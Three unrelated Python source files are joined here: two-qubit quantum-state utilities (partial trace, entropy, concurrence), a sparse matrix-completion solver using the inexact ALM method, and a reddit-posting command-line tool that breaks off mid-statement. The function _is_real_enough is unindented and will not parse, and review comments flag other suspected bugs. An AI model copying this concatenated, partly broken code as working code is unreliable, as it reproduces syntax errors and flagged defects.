    # Promote single states to batches of one so the result is always 2d.
    if np.ndim(state0) == 1:
        state0 = state0[np.newaxis, :]
    if np.ndim(state1) == 1:
        state1 = state1[np.newaxis, :]
    return np.conjugate(state0) @ np.transpose(state1)
def ip_square(state0, state1):
    """ Squared modulus |<state0|state1>|^2 of the inner product.
    Same output dimensions as the output of ip()."""
    overlap = np.abs(ip(state0, state1))
    return overlap * overlap
def norm(states):
    """ Norm of a state (or collection of states).
    Same output dimensions as the output of ip()."""
    gram = ip(states, states)
    return np.sqrt(np.real(gram))
def partial_trace(rho, subsystem='A'):
    """ Trace out one qubit of a two-qubit density matrix (or a batch of
    them), via an Einstein summation.

    Arguments
    ---------
    rho: np.array
        shape = (4 x 4) one density matrix
        shape = (N x 4 x 4) a collection of density matrices
    subsystem: str
        Which subsystem to trace OUT: 'A' returns the reduced state of B,
        any other value returns the reduced state of A.

    Output
    ------
    np.array of shape (2, 2) or (N, 2, 2)

    Raises
    ------
    ValueError if rho is not 2- or 3-dimensional (previously this crashed
    with an UnboundLocalError).
    """
    rho = np.asarray(rho)
    n_dim = rho.ndim
    if n_dim == 3:
        # reshaped indices: (batch, iA, iB, jA, jB)
        rho_rshp = np.reshape(rho, (len(rho), 2, 2, 2, 2))
        if subsystem == 'A':
            rho_partial = np.einsum('aijik->ajk', rho_rshp)
        else:
            rho_partial = np.einsum('aijkj->aik', rho_rshp)
    elif n_dim == 2:
        rho_rshp = np.reshape(rho, (2, 2, 2, 2))
        if subsystem == 'A':
            rho_partial = np.einsum('ijik->jk', rho_rshp)
        else:
            rho_partial = np.einsum('ijkj->ik', rho_rshp)
    else:
        raise ValueError("rho must have shape (4, 4) or (N, 4, 4), "
                         "got ndim=%d" % n_dim)
    return np.array(rho_partial)
def meas_one_sub(states, nb_measures=np.inf, n = [1,0,0], subsystem = 'A'):
    """simulates projective measurements on only one of the subsystem.
    Works only for two-qubits states
    Arguments
    ---------
    states:
        a list of state vectors
    nb_measures: int
        number of measurements to perform
        by default infinity, i.e. return the true expectation value of the
        operator, else if it is a finite number will return empirical value
    n: list<int>
        Encode the mesurement hermitian operator
        [a, b, c] -> O = aX + bY + cZ
    subsystem: <str>
        'A' or 'B' on which subsystem do we perform the measurement
    Output
    ------
    res 1d np.array with the same length as states
        Estimation of the expected value <O>
    """
    # NOTE(review): n=[1,0,0] is a mutable default; it is never mutated
    # here, but a tuple would be the safer choice.
    # Observable O = n . (X, Y, Z); Hermitian for real coefficients n.
    O = n[0] * X + n[1] * Y + n[2] * Z
    eigenvals, eigenvecs = np.linalg.eig(O)
    # _is_real_enough is defined elsewhere in this module -- presumably it
    # checks the imaginary parts are negligible; TODO confirm.
    assert _is_real_enough(eigenvals), "O has complex (i.e not real) eigenvalues"
    eigenvals = np.real(eigenvals)
    # Projection basis: each eigenvector of O, tensored with the
    # computational basis of the other (unmeasured) qubit.
    if(subsystem == 'A'):
        proj_basis = [np.stack([np.kron(e, qb_0), np.kron(e, qb_1)]) for e in
                      np.transpose(eigenvecs)]
    else:
        proj_basis = [np.stack([np.kron(qb_0, e), np.kron(qb_1, e)]) for e in
                      np.transpose(eigenvecs)]
    probs = proj_proba(states, basis = proj_basis)
    assert np.allclose(np.sum(probs, 1), 1.), "Measurement probas don't sum to 1"
    if(nb_measures == np.inf):
        # Exact expectation value: sum_i p_i * e_i.
        res = np.dot(probs, eigenvals)
    else:
        # Finite statistics: sample outcome frequencies binomially.
        freq = np.random.binomial(nb_measures, probs[:,0]) / nb_measures
        res = eigenvals[0] * freq + eigenvals[1] * (1-freq)
    return res
def proj_proba(states, basis = None):
    """ Probability of each state being projected onto each element of a
    measurement basis (vectors or subspaces).
    Arguments
    ---------
    states: np.array
        1d shape = (d)
        2d shape = (nb_states, d)
    basis: list
        In which basis do we perform the measurements.
        basis[i] is a np.array
        1d shape = (d) projection onto a single vector
        2d shape = (n_sub, d) projection onto a subspace
        Defaults to the computational basis when not specified.
    Output
    ------
    probs: np.array
        shape = (nb_states, nb_subspaces_proj)
        probs[n, i] is the probability of the n-th state being projected
        onto the i-th basis element
    """
    states = np.array(states)
    if states.ndim == 1:
        states = states[np.newaxis, :]
    dim_H = states.shape[1]
    if basis is None:
        basis = np.eye(dim_H)
    # Subspace probability = sum of |<state|b_k>|^2 over the subspace rows.
    probs = [np.sum(ip_square(states, b), 1) for b in basis]
    return np.transpose(probs)
def samples_from_proba(probs, nb_samples):
    """ Draw samples according to the given probabilities.
    NOTE(review): placeholder, not implemented yet ("to do later").
    """
    pass
# ===================================================================================== #
# Entanglement
# Mostly based on the Von Newman Entropy of the partial trace of a density matrix
# It could be extended to incorporate other measures
# ===================================================================================== #
def entangl_of_states(states, subsystem = 'A'):
    """ get a measure of entanglement (based on the Von Neumann entropy of
    the partial trace) of a list of states.
    For maximally entangled (separable) states it returns log(2) (0).
    Arguments
    ---------
    states: nd-array
        1d shape = (4) a single two-qubit state
        2d shape = (nb_states, 4) a collection of states
    subsystem: str
        On which subsystem do we trace out
    TODO: verif that it returns the same result whatever the subsystem is
    """
    # Pipeline: state -> density matrix -> reduced density matrix -> entropy.
    return vne_of_dm(partial_trace(state_to_dm(states), subsystem = subsystem))
def vne_of_dm(rhos):
    """ Von Neumann entropy of one (or a list of) density matrices
        vne_of_dm(rhos) = - tr[rho * log(rho)]
                        = - sum_i e_i * log(e_i) where e_i's are the eigenvalues of rho
    Arguments
    ---------
    rhos: nd-array
        shape = (d,d) one density matrix (d is the dim of the Hilbert space)
        shape = (nb_rho, d, d) collection of density matrices

    Raises
    ------
    ValueError
        If rhos is neither 2- nor 3-dimensional.  (Previously such input
        fell through both branches and raised UnboundLocalError.)
    """
    if np.ndim(rhos) == 2:
        e = linalg.eigvals(rhos)
        assert _is_real_enough(e), "Imaginary values of the eigenvalues are not null"
        e = np.real(e)
        # 0 * log(0) is taken to be 0: only non-zero eigenvalues contribute
        vn_entrop = - np.dot(e[e!=0], np.log(e[e!=0]))
    elif(np.ndim(rhos) == 3):
        vn_entrop = np.array([vne_of_dm(r) for r in rhos])
    else:
        raise ValueError(
            "rhos should be a 2d or 3d array, got ndim = {}".format(np.ndim(rhos)))
    return vn_entrop
def concurrence(psi):
    """ Bipartite concurrence of a list of two-qubit states.
    Another measure of entanglement: C = 2 * |alpha*delta - beta*gamma|.
    C = 0 for separable states, 1 for maximally entangled states, and in
    between otherwise (suggesting partial entanglement).
    TODO: verify/test
    """
    out = np.empty((len(psi), 1, 1), dtype=complex)
    for k in range(len(psi)):
        state = psi[k]
        det = state[0] * state[3] - state[1] * state[2]
        # det * conj(det) = |det|^2, so this is 2*|det|
        out[k] = 2 * np.sqrt(det * np.conjugate(det))
    return out
# ===================================================================================== #
# Use of Schmidt decomposition to generate random (two-qubit) states with a certain
# amount of entanglement
# |psi> = sqrt(lambda) |i>_A|i>_B + sqrt(1-lambda) |j>_A|j>_B
# Then Entanglement(|psi>) = - [lambda * log(lambda) + (1-lambda) * log(1-lambda)
#
# TODO: test vne_to_lambda
# ===================================================================================== #
def grid_lambda_gen(res):
    """ Generate lambda values whose entanglements sit on a regularly spaced
    grid of resolution res over [0, log(2)].
    *** Not really in use ***
    """
    targets = np.linspace(0, np.log(2), res)
    np.random.shuffle(targets)
    lambdas = [ent_to_lambda(t) for t in targets]
    return np.clip(lambdas, 0, 1)
def rdm_lambda_gen(nb):
    """ Generate nb lambda values (cf. Schmidt decomposition) such that the
    associated von Neumann entropies are uniformly distributed on [0, ln(2))
        vne = - [la * log(la) + (1 - la) * log(1 - la)]
    """
    entropies = np.log(2) * np.random.random(nb)
    lambdas = [ent_to_lambda(v) for v in entropies]
    return np.clip(lambdas, 0, 1)
def ent_to_lambda(ent):
    """ Numerically invert lambda_to_ent (elementwise on arrays). """
    if np.ndim(ent) > 0:
        # Recurse over every element, then restore the original shape
        flat = [ent_to_lambda(e) for e in np.nditer(ent)]
        return np.reshape(flat, np.shape(ent))
    if ent == 0:
        return 0
    func_root = lambda la: lambda_to_ent(la) - ent
    # Start the Newton iteration just above 0, where lambda_to_ent is monotone
    return optimize.newton(func_root, 10e-12)
def lambda_to_ent(la):
    """ Entanglement entropy from a Schmidt coefficient lambda
        ent = - [la * log(la) + (1 - la) * log(1 - la)]
    nan_to_num maps the 0*log(0) indeterminate form (nan) to 0.
    """
    raw = la * np.log(la) + (1 - la) * np.log(1 - la)
    return - np.nan_to_num(raw)
def rdm_states_from_lambda(lambdas):
    """ For a collection of lambdas, generate a collection of random states.
    Built from the Schmidt decomposition of a pure bipartite state:
        |psi> = sqrt(lambda) |i_A>|i_B> + sqrt(1 - lambda) |j_A>|j_B>
    where {|i_A>, |i_B>} ({|j_A>, |j_B>}) are a basis of system A (B)
    """
    nb_states = 1 if np.ndim(lambdas) == 0 else len(lambdas)
    basis_A = gen_rdm_basis(nb_states, 2)
    basis_B = gen_rdm_basis(nb_states, 2)
    if nb_states == 1:
        states = np.sqrt(lambdas) * np.kron(basis_A[:, 0], basis_B[:, 0])
        states = states + np.sqrt(1 - lambdas) * np.kron(basis_A[:, 1], basis_B[:, 1])
    else:
        states = [np.sqrt(lam) * np.kron(b_a[:, 0], b_b[:, 0])
                  + np.sqrt(1 - lam) * np.kron(b_a[:, 1], b_b[:, 1])
                  for lam, b_a, b_b in zip(lambdas, basis_A, basis_B)]
    return np.array(states)
def gen_rdm_basis(nb, dim):
    """ Generate random orthonormal bases, as the columns of Haar-random
    unitaries drawn with scipy.stats.unitary_group.rvs.
    Argument
    --------
    nb: int
        number of bases to generate
    dim: int
        dimension of the Hilbert space
    Output
    ------
    2d or 3-d np.array
        shape = ((nb), dim, dim)
        where output[(n), :, i] is the i-th state of the n-th basis
    """
    return stats.unitary_group.rvs(dim, size=nb)
def _is_real_enough(e):
""" test if the imaginary part is null (or really close to 0)"""
return np.allclose(np.imag(e), 0.)
|
<gh_stars>0
#! /usr/bin/env python
"""A matrix completion solver the implements Algorithm 6 (Matrix
Completion via Inexact ALM Method) from
"The Augmented Lagrange Multipler Method for Exact Recovery of
Corrupted Low-Rank Matrices"
by <NAME>, <NAME>, <NAME>, and <NAME>
http://arxiv.org/abs/1009.5055
This version is optimized for partially observed matrices.
"""
import numpy as np
import scipy.sparse as sp
from dimredu.lib.sparseSVDUpdate import sparseSVDUpdate
from dimredu.lib.projSVD import projSVD
from dimredu.lib.sparseFrobeniusNorm import sparseFrobeniusNorm
from dimredu.lib.minNucPlusFrob import minNucPlusFrob
def MC(m, n, u, v, d, maxRank, mu_0=None, rho=None, epsilon1=None,
       epsilon2=None, maxIteration=100, verbose=True, hasWeave=True):
    """Matrix completion for a partially observed matrix via the inexact
    augmented Lagrange multiplier (IALM) method.

    Optimized implementation of:
      "The Augmented Lagrange Multiplier Method for Exact Recovery
       of Corrupted Low-Rank Matrices"
      by Lin, Chen, and Ma, http://arxiv.org/abs/1009.5055

    Args:
      m, n: the full size of D.
      u, v, d: the samples of D as indices and values of a sparse matrix.
        All are one dimensional arrays.  Note: exact-zero entries of d
        are perturbed *in place* (see below), so the caller's array is
        mutated.
      maxRank: the maximum rank of D to consider for completion.
        (note, Lin-Chen-Ma have a way to predict this,
        which we are not using here)
      mu_0: the initial value for the augmented Lagrangian parameter.
        (optional, defaults to value from Lin-Chen-Ma)
      rho: the growth factor for the augmented Lagrangian parameter.
        (optional, defaults to value from Lin-Chen-Ma)
      epsilon1: the first error criterion that controls for the error in
        the constraint. (optional, defaults to value from Lin-Chen-Ma)
      epsilon2: the second error criterion that controls for the convergence
        of the method. (optional, defaults to value from Lin-Chen-Ma)
      maxIteration: the maximum number of iterations to use.
        (optional, defaults to 100)
      verbose: print out the convergence history.
        (optional, defaults to True)
      hasWeave: unused; kept only for backward compatibility of the
        signature.

    Returns:
      [U, S, VT]: the truncated SVD factors of the recovered low-rank
        matrix A, i.e. A = U * diag(S) * VT with at most maxRank
        singular values.
    """
    assert len(u.shape) == 1, 'u must be one dimensional'
    assert len(v.shape) == 1, 'v must be one dimensional'
    assert len(d.shape) == 1, 'd must be one dimensional'
    assert 0 <= np.max(u) < m, 'An entry in u is invalid'
    assert 0 <= np.max(v) < n, 'An entry in v is invalid'
    if epsilon1 is None:
        # The default value for epsilon1 is from the bottom of page
        # 12 in Lin-Chen-Ma.
        epsilon1 = 1e-7
    if epsilon2 is None:
        # The default value for epsilon2 is from the bottom of page
        # 12 in Lin-Chen-Ma.
        epsilon2 = 1e-6
    # The minimum value of the observed entries of D
    minD = np.min(d)
    # We keep a sparse matrix version of D, but we must be careful about
    # 0 values in d: we don't want them discarded on conversion to a
    # sparse matrix.  The sparse matrix is used in a slightly odd way --
    # stored entries (even 0) are *observed*, and unstored entries are
    # *unknown* (not necessarily 0).  So exact-0 observations are
    # perturbed to a "small" number relative to the smallest observed
    # value.  This mutates the caller's array in place, as before.
    d[d == 0] = minD * epsilon1
    # Create the required sparse matrices.  Note, u,v,d might have
    # repeats, and that is ok since sp.coo_matrix handles that case,
    # and we don't actually use d after here.
    D = sp.csc_matrix(sp.coo_matrix((d, (u, v)), shape=[m, n]))
    # The Frobenius norm of the observed entries of D.  This is
    # just the 2-norm of the *vector* of entries.
    partialFrobeniusD = sparseFrobeniusNorm(D)
    # The SVD of the answer A
    U = np.matrix(np.zeros([m, maxRank]))
    S = np.zeros([maxRank])
    VT = np.matrix(np.zeros([maxRank, n]))
    # Compute the largest singular value of D, assuming the unobserved
    # entries are 0.  (Arguably unprincipled, but it is what the paper
    # does.)
    dummy, S0, dummy = sparseSVDUpdate(D, U[:, 0], np.array([S[0]]), VT[0, :])
    if mu_0 is None:
        # The default value for mu_0 is from the bottom of page 12 in
        # Lin-Chen-Ma: the reciprocal of the spectral norm of D (largest
        # singular value), with unobserved entries assumed to be 0.
        # FIXME: not obviously principled -- why is 0 special?  An
        # improperly scaled D can probably break this.
        mu_0 = 1. / S0[0]
    if rho is None:
        # The default value for rho is from the bottom of page 12 in
        # Lin-Chen-Ma, driven by the sampling density rho_s.
        rho_s = len(d) / (m * n)
        rho = 1.2172 + 1.8588 * rho_s
    # The sparse Lagrange multipliers
    Y_0 = D * 0.0
    # The projection of A onto Omega.  This is not required
    # but is convenient to have.
    POA_0 = D * 0.0
    POA_1 = D * 0.0
    iteration = 0
    while True:
        # Break if we use too many iterations
        iteration += 1
        if iteration > maxIteration:
            break
        # This is the mathematical content of the algorithm
        ###################################################
        # We know that E_0 = POA_0 - A_0 = POA_0 - U_0*S_0*VT_0, so
        #   [U,S,VT] = np.linalg.svd(D-E_0+Y_0/mu_0, full_matrices=False)
        # can be rewritten, combining the sparse terms, as
        #   [U,S,VT] = np.linalg.svd((D-POA_0+Y_0/mu_0) + U_0*S_0*VT_0,
        #                            full_matrices=False)
        [U, S, VT] = minNucPlusFrob(D - POA_0 + Y_0 / mu_0, U, S, VT, mu_0)
        # and we compute the projection of A onto Omega.  Only the
        # observed (u, v) entries of the SVD product are formed.
        POA_1 = projSVD(U, S, VT, u, v)
        # Update the Lagrange multiplier.  Since E_1 = POA_1 - A_1,
        # plugging into Y_1 = Y_0 + mu_0*(D-A_1-E_1) gives
        #   Y_1 = Y_0 + mu_0*(D-POA_1)
        Y_1 = Y_0 + mu_0 * (D - POA_1)
        ###################################################
        # If the method is converging well then increase mu_0 to focus
        # more on the constraint.  The paper's test uses the spectral
        # norm of POA_1-POA_0; we don't know how to compute that for a
        # partially observed matrix, so the Frobenius norm on the
        # observed entries is used instead.  FIXME: justify.
        if (mu_0 * sparseFrobeniusNorm(POA_1 - POA_0) / partialFrobeniusD
                < epsilon2):
            mu_0 = rho * mu_0
        # Stopping criteria from page 12 of Lin, Chen, and Ma, with
        # D-A_1-E_1 simplified to D-POA_1 as above.
        # FIXME: justify the change from the full Frobenius norm to the
        # partial one.
        criterion1 = sparseFrobeniusNorm(D - POA_1) / partialFrobeniusD
        # This is the one place where we depart from Lin-Chen-Ma: their
        # criterion also involves A.  To keep the algorithm fast the A
        # part is ignored, since it would cost O(mn).
        # FIXME: justify; the partial-Frobenius substitution again.
        criterion2 = np.min([mu_0, np.sqrt(mu_0)]) * \
            sparseFrobeniusNorm(POA_1 - POA_0) / partialFrobeniusD
        if verbose:
            if iteration == 1:
                # (A stray debug print("printing") used to live here.)
                print(("iteration criterion1 epsilon1 " +
                       "criterion2 epsilon2 rho mu"))
            if iteration % 10 == 0:
                print(('%9d %10.2e %8.2e %10.2e %8.2e %8.2e %8.2e' %
                       (iteration, criterion1, epsilon1, criterion2, epsilon2,
                        rho, mu_0)))
        # If both error criteria are satisfied stop the algorithm
        if criterion1 < epsilon1 and criterion2 < epsilon2:
            break
        Y_0 = Y_1.copy()
        POA_0 = POA_1.copy()
    return [U, S, VT]
def test_compare():
    """Cross-check the sparse MC solver against the CVXPy and dense IALM
    implementations on a small random rank-1 completion problem."""
    from dimredu.MCviaCVXPy import MC as MCCVXPy
    from dimredu.MCviaIALM import MC as MCSlow
    m, n = 5, 7
    U = np.matrix(np.random.random(size=[m, 1]))
    V = np.matrix(np.random.random(size=[n, 1]))
    D = U * V.T
    # Observation mask: keep roughly 70% of the entries
    Omega = np.zeros([m, n])
    tmp = np.random.uniform(size=[m, n])
    Omega[tmp < 0.7] = 1
    ACVXPy = MCCVXPy(np.multiply(Omega, D), Omega)
    ASlow, ESlow = MCSlow(np.multiply(Omega, D), Omega, maxIteration=200)
    # Convert the masked matrix to the (u, v, d) triplet form MC expects
    rows, cols = np.nonzero(Omega)
    u = np.array(rows)
    v = np.array(cols)
    d = np.array([D[i, j] for i, j in zip(rows, cols)])
    [U, S, VT] = MC(m, n, u, v, d, 4)
    AFast = U * np.diag(S) * VT
    assert np.allclose(ACVXPy, D, atol=1e-1)
    assert np.allclose(ASlow, D, atol=1e-1)
    assert np.allclose(AFast, D, atol=1e-1)
def profile_large():
    """Run the sparse MC solver on a larger random rank-2 problem and print
    the worst reconstruction error over a random sample of entries."""
    m, n = 200, 500
    samples = int(0.4 * m * n)
    print(('samples', samples))
    np.random.seed(1234)
    origU = np.matrix(np.random.random(size=[m, 2]))
    origV = np.matrix(np.random.random(size=[n, 2]))
    u, v, d = [], [], []
    # Repeated (row, col) pairs are fine: the solver feeds them through
    # coo_matrix very early, which handles duplicates gracefully.
    for _ in range(samples):
        i = np.random.randint(0, m)
        j = np.random.randint(0, n)
        u.append(i)
        v.append(j)
        d.append(float(origU[i, :] * (origV.T)[:, j]))
    u, v, d = np.array(u), np.array(v), np.array(d)
    # maxRank matters for convergence: the answer is only rank 2, but the
    # extra dimensions appear to be needed for the iteration to converge.
    maxRank = 10
    [U, S, VT] = MC(m, n, u, v, d, maxRank, rho=1.01, maxIteration=500)
    # Randomly sample entries to estimate the reconstruction error
    errorSamples = 500
    errors = np.zeros([errorSamples])
    for k in range(errorSamples):
        i = np.random.randint(0, m)
        j = np.random.randint(0, n)
        exact = origU[i, :] * (origV.T)[:, j]
        approx = U[i, :] * np.diag(S) * VT[:, j]
        errors[k] = np.abs(exact - approx)
    print((np.max(errors)))
def profile():
    """Profile profile_large() and dump the results to the 'stats' file."""
    import cProfile
    command, stats_file = 'profile_large()', 'stats'
    cProfile.run(command, stats_file)
# Run the small correctness check when executed as a script.
if __name__ == '__main__':
    test_compare()
|
import logging
import warnings
import click
import validators as val
from praw.models import Submission
from sqlalchemy import sql
from tabulate import tabulate
from . import extract
from . import helper as h
from . import paramtypes as types
class EBFormatter(logging.Formatter):
    """Log formatter that prints INFO records bare and prefixes every other
    level with its title-cased level name (e.g. "Warning: ...")."""

    def format(self, record):
        message = record.getMessage()
        if record.levelname == "INFO":
            return message
        return "{}: {}".format(record.levelname.title(), message)
eb_log = logging.getLogger("errantbot")
eb_log.propagate = False
eb_log.setLevel(logging.INFO)
eb_handler = logging.StreamHandler()
eb_handler.setFormatter(EBFormatter())
eb_log.addHandler(eb_handler)
logging.basicConfig()
log = logging.getLogger("errantbot.cli")
@click.group()
@click.pass_context
def cli(ctx):
    # Root command group.  (No docstring on purpose: click would surface
    # it as --help text.)
    # Silence a noisy SQLAlchemy reflection warning.
    warnings.filterwarnings("ignore", r"Could not parse CHECK constraint text")
    # Shared connection bundle (db/meta/reddit -- see h.Connections),
    # handed to subcommands via @click.pass_obj.
    ctx.obj = h.Connections()
@cli.command()
@click.pass_obj
@click.argument("source-url", required=True, type=types.url)
@click.argument("submissions", nargs=-1, type=types.submission)
@click.option("--title", "-t")
@click.option("--artist", "-a")
@click.option("--series", "-s")
@click.option("--nsfw/--sfw", "-n/-N", default=None)
@click.option("--index", "-i", default=0, type=int)
@click.option("--album", "-l", is_flag=True)
@click.option("--no-post", "-P", is_flag=True)
@click.option("--add-sr", "-r", is_flag=True)
@click.option("--username", "-u", is_flag=True)
@click.option("--wait", "-w", type=int, default=18)
def add(
    con,
    source_url,
    submissions,
    title,
    artist,
    series,
    nsfw,
    index,
    album,
    no_post,
    add_sr,
    username,
    wait,
):
    # Extract a work from source_url, save it, and submit it to the given
    # subreddits (upload to imgur first, then post unless --no-post).
    submissions = h.Submissions(submissions)
    if add_sr:
        # Register any unknown subreddits first (upsert=False keeps
        # existing rows untouched).
        h.edit_subreddits(
            con, tuple(n_f_t.name for n_f_t in submissions.n_f_t), upsert=False
        )
    work = extract.auto(source_url, index=index, album=album, username=username)
    # --nsfw/--sfw is tri-state (default=None means "not given").  Use an
    # explicit None check so an explicit --sfw (False) is honoured; the
    # previous `nsfw or work.nsfw` silently fell back to the extracted
    # value whenever --sfw was passed.
    work_id = h.save_work(
        con,
        title or work.title,
        series or work.series,
        (artist,) + work.artists if artist else work.artists,
        work.source_url,
        work.nsfw if nsfw is None else nsfw,
        work.image_url,
    )
    if work_id:
        h.add_submissions(con, work_id, submissions)
        h.upload_to_imgur(con, work_id)
        if not no_post:
            h.post_submissions(con, work_id, wait=wait)
@cli.command()
@click.pass_obj
@click.argument("title", required=True)
@click.argument("artist", required=True)
@click.argument("source-url", type=types.url, required=True)
@click.argument("source-image-url", type=types.url, required=True)
@click.argument("submissions", nargs=-1, type=types.submission)
@click.option("--no-post", "-P", is_flag=True)
@click.option("--nsfw/--sfw", "-n/-N")
@click.option("--series", "-s")
@click.option("--wait", "-w", type=int, default=18)
def add_custom(
    con,
    title,
    artist,
    source_url,
    source_image_url,
    submissions,
    no_post,
    nsfw,
    series,
    wait,
):
    # Manually register a work (bypassing the extractor) and submit it.
    # NOTE(review): unlike `add`, --nsfw/--sfw here has no default=None,
    # so omitting the flag means SFW -- confirm that is intended.  Also
    # note `add` guards on a truthy work_id before submitting; this
    # command does not.
    submissions = h.Submissions(submissions)
    work_id = h.save_work(
        con, title, series, (artist,), source_url, nsfw, source_image_url
    )
    h.add_submissions(con, work_id, submissions)
    h.upload_to_imgur(con, work_id)
    if not no_post:
        h.post_submissions(con, work_id, wait=wait)
@cli.command()
@click.pass_obj
@click.argument("names", type=types.subreddit, nargs=-1)
@click.option("--disabled", "-d", is_flag=True)
@click.option("--flair-id", "-l", type=types.flair_id)
@click.option("--force", "-f", is_flag=True)
@click.option("--no-space-out", "-O", is_flag=True)
@click.option("--require-flair/--no-require-flair", "-q/-Q", is_flag=True)
@click.option("--require-series", "-e", is_flag=True)
@click.option("--require-tag", "-t", is_flag=True)
@click.option("--sfw-only", "-N", is_flag=True)
@click.option("--tag-series", "-s", is_flag=True)
def sr(
    con,
    names,
    disabled,
    flair_id,
    force,
    require_flair,
    require_series,
    require_tag,
    sfw_only,
    no_space_out,
    tag_series,
):
    # Create or update subreddit configuration rows.
    # NOTE(review): the arguments below are passed positionally to
    # h.edit_subreddits -- keep their order in sync with its signature.
    # --no-space-out is inverted here into a "space out" value.
    h.edit_subreddits(
        con,
        names,
        disabled,
        flair_id,
        force,
        require_flair,
        require_series,
        require_tag,
        sfw_only,
        not no_space_out,
        tag_series,
    )
@cli.command()
@click.pass_obj
@click.argument("work-id", type=int, required=True)
@click.argument("submissions", nargs=-1, type=types.submission)
@click.option("--add-sr", "-r", is_flag=True)
@click.option("--no-post", "-P", is_flag=True)
@click.option("--wait", "-w", type=int, default=18)
def xpost(con, work_id, submissions, no_post, add_sr, wait):
    # Cross-post an already-saved work to additional subreddits.
    submissions = h.Submissions(submissions)
    if add_sr:
        # Register any unknown subreddits first.
        h.edit_subreddits(
            con, tuple(n_f_t.name for n_f_t in submissions.n_f_t), upsert=False
        )
    h.add_submissions(con, work_id, submissions)
    if not no_post:
        # Unlike `add`, the explicit submissions list is forwarded to
        # post_submissions here.
        h.post_submissions(con, work_id, submissions, wait=wait)
@cli.command()
@click.pass_obj
@click.argument("submissions", nargs=-1, type=types.submission)
@click.option("--add-sr", "-r", is_flag=True)
@click.option("--no-post", "-P", is_flag=True)
@click.option("--wait", "-w", type=int, default=18)
def xpost_last(con, submissions, no_post, add_sr, wait):
    # Cross-post the most recently added work to additional subreddits.
    submissions = h.Submissions(submissions)
    if add_sr:
        # Register any unknown subreddits first.
        h.edit_subreddits(
            con, tuple(n_f_t.name for n_f_t in submissions.n_f_t), upsert=False
        )
    # Id of the most recent row in the works table.
    work_id = h.get_last(con, "works")
    h.add_submissions(con, work_id, submissions)
    if not no_post:
        h.post_submissions(con, work_id, submissions, wait=wait)
@cli.command()
@click.pass_obj
@click.argument("work-ids", type=int, nargs=-1)
@click.option("--last", "-l", is_flag=True)
@click.option("--wait", "-w", type=int, default=18)
def retry(con, work_ids, last, wait):
    # Re-attempt posting the given works (or the most recent with --last).
    h.post_submissions(con, work_ids, last=last, wait=wait)
@cli.command()
@click.pass_obj
@click.option("--wait", "-w", type=int, default=18)
def retry_all(con, wait):
    # Re-attempt posting every pending submission.
    h.post_submissions(con, do_all=True, wait=wait)
@cli.command()
@click.pass_obj
def retry_all_uploads(con):
    # Re-attempt the imgur upload for every pending work.
    # Fix: the old signature also took a `no_wait` parameter that no
    # click option supplied, so invoking the command always raised a
    # TypeError (click passes only declared parameters).
    h.upload_to_imgur(con, do_all=True)
@cli.command()
@click.pass_obj
@click.argument("work-ids", type=int, nargs=-1)
@click.option("--last", "-l", is_flag=True)
def retry_upload(con, work_ids, last):
    # Re-attempt the imgur upload for the given works (or the last one).
    h.upload_to_imgur(con, work_ids, last=last)
@cli.command()
@click.pass_obj
@click.argument("subreddit-name", type=types.subreddit, required=True)
def flairs(con, subreddit_name):
    # List the link-flair templates available on a subreddit.
    sub = h.subreddit_or_status(con.reddit, subreddit_name)
    if not sub:
        # A falsy result is a status value (it has a .name), not a usable
        # subreddit.  Fix: bail out here -- previously execution fell
        # through and touched subreddit-only attributes below.
        log.warning("/r/%s is %s", subreddit_name, sub.name.lower())
        return
    if not sub.can_assign_link_flair:
        log.warning("/r/%s does not allow users to assign link flair", subreddit_name)
    else:
        columns = map(
            lambda flair: (flair["text"], flair["id"]), sub.flair.link_templates
        )
        click.echo(tabulate(columns, headers=["Text", "ID"]))
@cli.command("extract")
@click.argument("url", required=True, type=types.url)
@click.option("--index", "-i", default=0, type=int)
@click.option("--album", "-l", is_flag=True)
@click.option("--username", "-u", is_flag=True)
def _extract(url, index, album, username):
work = extract.auto(url, index=index, album=album, username=username)
for field in work._fields:
attr = getattr(work, field)
attr = "'" + attr + "'" if type(attr) == str else attr
click.echo("{}:\t{}".format(field, attr))
@cli.command()
@click.pass_obj
@click.argument("names", nargs=-1, type=types.subreddit)
@click.option("--ready/--not-ready", "-r/-R", default=None)
def list_srs(con, names, ready):
    # Print the subreddit table with a per-subreddit post count, optionally
    # filtered by name and by readiness (last submission older than a day).
    sr_table = con.meta.tables["subreddits"]
    sub_table = con.meta.tables["submissions"]
    # All subreddit columns plus a correlated COUNT(*) of its submissions.
    query = (
        sql.select(
            sr_table.c
            + [
                sql.select([sql.func.count()])
                .select_from(sub_table)
                .where(sub_table.c.subreddit_id == sr_table.c.id)
                .label("post_count")
            ]
        )
        .select_from(sr_table)
        .order_by("id")
    )
    if len(names) > 0:
        query = query.where(sr_table.c.name.in_(names))
    # --ready/--not-ready is tri-state; None (flag omitted) means no filter.
    # NOTE(review): rows with NULL last_submission_on match neither filter.
    if ready is True:
        query = query.where(
            sr_table.c.last_submission_on
            < sql.func.now() - sql.text("INTERVAL '1 day'")
        )
    if ready is False:
        query = query.where(
            sr_table.c.last_submission_on
            > sql.func.now() - sql.text("INTERVAL '1 day'")
        )
    result = con.db.execute(query)
    click.echo(tabulate(result.fetchall(), headers=result.keys()))
@cli.command()
@click.pass_obj
def list_works(con):
    # Print every stored work with its artist, series, and URLs.
    query = sql.text(
        """SELECT title, artists.name as artist, series, imgur_url, source_url
        FROM works INNER JOIN artists ON artist_id = artists.id"""
    )
    result = con.db.execute(query)
    click.echo(tabulate(result.fetchall(), headers=result.keys()))
@cli.command()
@click.pass_obj
@click.option("--reddit-id", "-r", "id_type", flag_value="reddit", default=True)
@click.option("--submission-id", "-s", "id_type", flag_value="submission")
@click.option("--from-reddit", "-f", is_flag=True)
@click.argument("post-id", type=int)
def delete_post(con, id_type, from_reddit, post_id):
    # Unlink a post from its reddit submission, optionally deleting the
    # reddit post (and our comments on it) as well.
    # Fix: --from-reddit previously reused the short flag "-r", which
    # collided with --reddit-id's "-r" and shadowed it at parse time;
    # it now uses "-f".
    # NOTE(review): the mapping below looks inverted -- --submission-id
    # sets use_reddit=True while --reddit-id triggers the DB lookup
    # branch; verify against actual usage.  Also, post-id is type=int,
    # so the val.url()/Submission.id_from_url path can never trigger.
    submissions = con.meta.tables["submissions"]
    use_reddit = id_type == "submission"
    if not use_reddit:
        # Resolve the DB submission row to its stored reddit id.
        submission_id = post_id
        query = sql.select([submissions.c.reddit_id]).where(
            submissions.c.id == submission_id
        )
        row = con.db.execute(query).first()
        if row is None:
            log.error("Submission %s does not exist", submission_id)
            return
        reddit_id = row["reddit_id"]
    else:
        reddit_id = post_id
        if val.url(reddit_id):
